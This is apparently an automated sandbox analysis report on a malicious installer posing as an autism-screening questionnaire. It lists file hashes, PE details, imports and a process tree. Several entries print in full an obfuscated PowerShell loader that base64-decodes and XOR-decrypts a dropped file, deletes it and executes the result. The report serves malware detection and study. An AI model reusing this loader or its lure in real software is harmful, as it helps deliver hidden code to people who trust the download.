                                                                                            • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.zcmp3+HP.20211211144037.txt, Author: Joe Security
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211211144057..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2f
                                                                                            C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):67756
                                                                                            Entropy (8bit):5.725745924531966
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:JDOs355yymmEeRPDcJytgdmxa2dAEslokZLM4kEbQWQvFH0i8n:JDLTTE0FBxiE9XE8hiFn
                                                                                            MD5:25D1B8AAB3AC4F8A9E44E5B470818DF6
                                                                                            SHA1:3AE880B40C06A0C14092E25729BA03E7769DD365
                                                                                            SHA-256:70D5FA6EFCD01C196D1BA1A6207B47FE5457D4AEB3105DF561A462570F79BB04
                                                                                            SHA-512:6AB29E4B241933F8FFBF85535D79E88AF32D198EC43B8EDEB3AB08DC6C55EAD5898CEE8DDBD60C960FE6E894A80A9E68187DD74664FFF9189BA629A379CC6497
                                                                                            Malicious:true
                                                                                            Preview: aDAPXQsxZiEjEkx6RVB8S340V1cuLDd/MUIQZnEiekMwC0h0DCwILRQgEwAMDl9fKDwdKik0Wj0nAAQpE0McHDcJGEcrPREbGiEVGxoYHmUbcis3Nh4pAwcUAA0gBSVcDjYCGCILHRkoFA8mP2RmcXA3GAYQIj4/fTwaKnw1PnoyPTc9JAsvVD0zDAoYPxQSMBIcNggJNAwnGxoVDWAPCCAGHzAAGzkQMDFzCh4VIzcCIWIhESEnMwEFAVIvaV4FBC8EbCMDTxYNDQkXIiYJFQ0EMTAmMTsMIyQ6IzwJEwQZPCASBS4/HQ0aLxURGTRULDo9LxsXIj0sLB8POAgWFiwpCS4DFjEnChEiEXAbQTolDgQcGwEsLysIBSY2Jz9lGhcvIyloIQ0DLgQSJS4HLA02Al8nCE8hHT09JSQuBHEQJRwoJ1UiKwIZIC8efDc6BBwBExQUKz0dEQsWAxY2HiADIQULNgonFCc3DAEUIT4wPh9yCiA8ECAOOSEDEg4jEhURHAU6QCYMCS8MLx8+cAAvNWw6WjkpFTQwOgsITCcWCD0pJAIqBhIjTRgjMhgbGBFXEix9HRw1QSc4FQQdUS4PPnUbLSIAEy4lOQwrDlkVNzcqLwRTEyYAPikgJj15KFUQNCsAMDYSBwkFDUE3YBpzdlQqaRMcARA2Mxc9QgE4OzQECyozNQEZAzA+EzE0EyYiDiQwJUANAyczHiESezgnQBoMBwUqNw01EiZKWWsvWh9eDzUsORInLwQBOypbOgAcMBM4Jh4gDDo/ATERBgQLFSoyHB4nES8BKk1oCHEDLCI5IwU4GQwJJA4LCg4VHwc9ASdkawomNCUHIwgYQRoFDSMeCwYFBBw/JhAUDlAiKB8zBhYqHSIFDyEiNA4tH39IGhYGMRg4Oj4ZEjUuDTQwIiUrPVMoHyQVEQVBJz8WLDMnLgxTPBsiDRpHWQc2CVICHBwcLzUWYxsjCGQ2FTMkMiYUA3sJGD00ORoY

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.99440427005356
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            File name:Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
                                                                                            File size:103560224
                                                                                            MD5:ae5b37182059c7733466788212370e71
                                                                                            SHA1:e6b0ee285d7042834d23743ad8ca188082ac264f
                                                                                            SHA256:44af59a2d70ba23f2f80d80090d11184ef923a746c0c9ea3c81922bd8d899346
                                                                                            SHA512:32cffc0422bc641dc7a5537e0b809ed6ed5540fb4b0876d4158ee01217ccaf04d68bf6547b1ae3a79da3e168e10f5c3d7d6cde219705fb9eeaaeecc4d8ba7c7f
                                                                                            SSDEEP:196608:NppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppC:6oLi
                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                            File Icon

                                                                                            Icon Hash:74f4f4dce4f2e4e4

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x4b5eec
                                                                                            Entrypoint Section:.itext
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                            Time Stamp:0x60B88E27 [Thu Jun 3 08:09:11 2021 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:6
                                                                                            OS Version Minor:1
                                                                                            File Version Major:6
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:6
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:5a594319a0d69dbc452e748bcf05892e

                                                                                            Authenticode Signature

                                                                                            Signature Valid:false
                                                                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                            Signature Validation Error:A certificate was explicitly revoked by its issuer
                                                                                            Error Number:-2146762484
                                                                                            Not Before, Not After
                                                                                            • 8/25/2021 5:00:00 PM 8/24/2022 4:59:59 PM
                                                                                            Subject Chain
                                                                                            • CN=Full Stack s. r. o., O=Full Stack s. r. o., L=Bratislava, C=SK, SERIALNUMBER=53 958 748, OID.1.3.6.1.4.1.311.60.2.1.3=SK, OID.2.5.4.15=Private Organization
                                                                                            Version:3
                                                                                            Thumbprint MD5:B6076F74572111FFBFD755C8D98F21E7
                                                                                            Thumbprint SHA-1:160A9CF7400D11BEFFD349F47136264EE56B6686
                                                                                            Thumbprint SHA-256:9F5A6811259566D82B89ECA78CA84B0B21AEFD783616E1142ED006C67707F892
                                                                                            Serial:0C6B875DE4F598244A6D6751ABFBDFBD

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            add esp, FFFFFFA4h
                                                                                            push ebx
                                                                                            push esi
                                                                                            push edi
                                                                                            xor eax, eax
                                                                                            mov dword ptr [ebp-3Ch], eax
                                                                                            mov dword ptr [ebp-40h], eax
                                                                                            mov dword ptr [ebp-5Ch], eax
                                                                                            mov dword ptr [ebp-30h], eax
                                                                                            mov dword ptr [ebp-38h], eax
                                                                                            mov dword ptr [ebp-34h], eax
                                                                                            mov dword ptr [ebp-2Ch], eax
                                                                                            mov dword ptr [ebp-28h], eax
                                                                                            mov dword ptr [ebp-14h], eax
                                                                                            mov eax, 004B10F0h
                                                                                            call 00007FDCEC68DB35h
                                                                                            xor eax, eax
                                                                                            push ebp
                                                                                            push 004B65E2h
                                                                                            push dword ptr fs:[eax]
                                                                                            mov dword ptr fs:[eax], esp
                                                                                            xor edx, edx
                                                                                            push ebp
                                                                                            push 004B659Eh
                                                                                            push dword ptr fs:[edx]
                                                                                            mov dword ptr fs:[edx], esp
                                                                                            mov eax, dword ptr [004BE634h]
                                                                                            call 00007FDCEC73025Fh
                                                                                            call 00007FDCEC72FDB2h
                                                                                            lea edx, dword ptr [ebp-14h]
                                                                                            xor eax, eax
                                                                                            call 00007FDCEC6A35A8h
                                                                                            mov edx, dword ptr [ebp-14h]
                                                                                            mov eax, 004C1D84h
                                                                                            call 00007FDCEC688727h
                                                                                            push 00000002h
                                                                                            push 00000000h
                                                                                            push 00000001h
                                                                                            mov ecx, dword ptr [004C1D84h]
                                                                                            mov dl, 01h
                                                                                            mov eax, dword ptr [004237A4h]
                                                                                            call 00007FDCEC6A460Fh
                                                                                            mov dword ptr [004C1D88h], eax
                                                                                            xor edx, edx
                                                                                            push ebp
                                                                                            push 004B654Ah
                                                                                            push dword ptr fs:[edx]
                                                                                            mov dword ptr fs:[edx], esp
                                                                                            call 00007FDCEC7302E7h
                                                                                            mov dword ptr [004C1D90h], eax
                                                                                            mov eax, dword ptr [004C1D90h]
                                                                                            cmp dword ptr [eax+0Ch], 01h
                                                                                            jne 00007FDCEC7368CAh
                                                                                            mov eax, dword ptr [004C1D90h]
                                                                                            mov edx, 00000028h
                                                                                            call 00007FDCEC6A4F04h
                                                                                            mov edx, dword ptr [004C1D90h]

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0xc40000x9a.edata
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc20000xf36.idata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000xf57c.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x62c0f980x2488
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0xc60000x18.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xc22e40x244.idata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xc30000x1a4.didata
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000xb361c0xb3800False0.344863934105data6.35605820433IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                            .itext0xb50000x16880x1800False0.544921875data5.97275005522IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                            .data0xb70000x37a40x3800False0.360979352679data5.04440056201IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                            .bss0xbb0000x6de80x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                            .idata0xc20000xf360x1000False0.3681640625data4.89870464796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                            .didata0xc30000x1a40x200False0.345703125data2.75636286825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                            .edata0xc40000x9a0x200False0.2578125data1.87222286659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .tls0xc50000x180x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0xc60000x5d0x200False0.189453125data1.38389437522IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0xc70000xf57c0xf600False0.254176194106data4.75187303433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_ICON0xc75880x18dePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                            RT_ICON0xc8e680x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 57599, next used block 4294905600EnglishUnited States
                                                                                            RT_ICON0xcd0900x25a8dataEnglishUnited States
                                                                                            RT_ICON0xcf6380x1a68dataEnglishUnited States
                                                                                            RT_ICON0xd10a00x10a8dataEnglishUnited States
                                                                                            RT_ICON0xd21480x988dataEnglishUnited States
                                                                                            RT_ICON0xd2ad00x6b8dataEnglishUnited States
                                                                                            RT_ICON0xd31880x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                            RT_STRING0xd35f00x360data
                                                                                            RT_STRING0xd39500x260data
                                                                                            RT_STRING0xd3bb00x45cdata
                                                                                            RT_STRING0xd400c0x40cdata
                                                                                            RT_STRING0xd44180x2d4data
                                                                                            RT_STRING0xd46ec0xb8data
                                                                                            RT_STRING0xd47a40x9cdata
                                                                                            RT_STRING0xd48400x374data
                                                                                            RT_STRING0xd4bb40x398data
                                                                                            RT_STRING0xd4f4c0x368data
                                                                                            RT_STRING0xd52b40x2a4data
                                                                                            RT_RCDATA0xd55580x10data
                                                                                            RT_RCDATA0xd55680x2c4data
                                                                                            RT_RCDATA0xd582c0x2cdata
                                                                                            RT_GROUP_ICON0xd58580x76dataEnglishUnited States
                                                                                            RT_VERSION0xd58d00x584dataEnglishUnited States
                                                                                            RT_MANIFEST0xd5e540x726XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                            Imports

                                                                                            DLLImport
                                                                                            kernel32.dllGetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                            comctl32.dllInitCommonControls
                                                                                            version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                            user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                            oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                            netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                            advapi32.dllRegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

                                                                                            Exports

                                                                                            NameOrdinalAddress
                                                                                            TMethodImplementationIntercept30x454060
                                                                                            __dbk_fcall_wrapper20x40d0a0
                                                                                            dbkFCallWrapperAddr10x4be63c

                                                                                            Version Infos

                                                                                            DescriptionData
                                                                                            LegalCopyright(c) InvestTech
                                                                                            FileVersion
                                                                                            CompanyName
                                                                                            CommentsThis installation was built with Inno Setup.
                                                                                            ProductNameSlimReader
                                                                                            ProductVersion1.4.1.2
                                                                                            FileDescriptionSlimReader Setup
                                                                                            OriginalFileName
                                                                                            Translation0x0000 0x04b0

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            No network behavior found

                                                                                            Code Manipulations

                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            Analysis Process: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe PID: 7084 Parent PID: 3640

                                                                                            General

                                                                                            Start time:14:40:26
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:103560224 bytes
                                                                                            MD5 hash:AE5B37182059C7733466788212370E71
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Reputation:low

                                                                                            Chronological Activities

                                                                                            Analysis Process: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp PID: 2880 Parent PID: 7084

                                                                                            General

                                                                                            Start time:14:40:27
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:3156992 bytes
                                                                                            MD5 hash:8693B9CFB8B4C466AE12CCDC2FEB46CE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, Metadefender, Browse
                                                                                            • Detection: 9%, ReversingLabs
                                                                                            Reputation:low

                                                                                            Chronological Activities

                                                                                            Analysis Process: AcroRd32.exe PID: 6300 Parent PID: 2880

                                                                                            General

                                                                                            Start time:14:40:30
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf
                                                                                            Imagebase:0xfe0000
                                                                                            File size:2571312 bytes
                                                                                            MD5 hash:B969CF0C7B2C443A99034881E8C8740A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate

                                                                                            Chronological Activities

                                                                                            Analysis Process: AcroRd32.exe PID: 5356 Parent PID: 6300

                                                                                            General

                                                                                            Start time:14:40:30
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf
                                                                                            Imagebase:0xfe0000
                                                                                            File size:2571312 bytes
                                                                                            MD5 hash:B969CF0C7B2C443A99034881E8C8740A
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate

                                                                                            Chronological Activities

                                                                                            Analysis Process: powershell.exe PID: 5516 Parent PID: 2880

                                                                                            General

                                                                                            Start time:14:40:32
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
                                                                                            Imagebase:0x11b0000
                                                                                            File size:430592 bytes
                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Analysis Process: conhost.exe PID: 3628 Parent PID: 5516

                                                                                            General

                                                                                            Start time:14:40:33
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7f20f0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Analysis Process: powershell.exe PID: 5972 Parent PID: 2880

                                                                                            General

                                                                                            Start time:14:40:33
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
                                                                                            Imagebase:0x11b0000
                                                                                            File size:430592 bytes
                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Analysis Process: powershell.exe PID: 6580 Parent PID: 2880

                                                                                            General

                                                                                            Start time:14:40:33
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
                                                                                            Imagebase:0x11b0000
                                                                                            File size:430592 bytes
                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:high

                                                                                            Chronological Activities

                                                                                            Analysis Process: conhost.exe PID: 6620 Parent PID: 5972

                                                                                            General

                                                                                            Start time:14:40:33
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7f20f0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

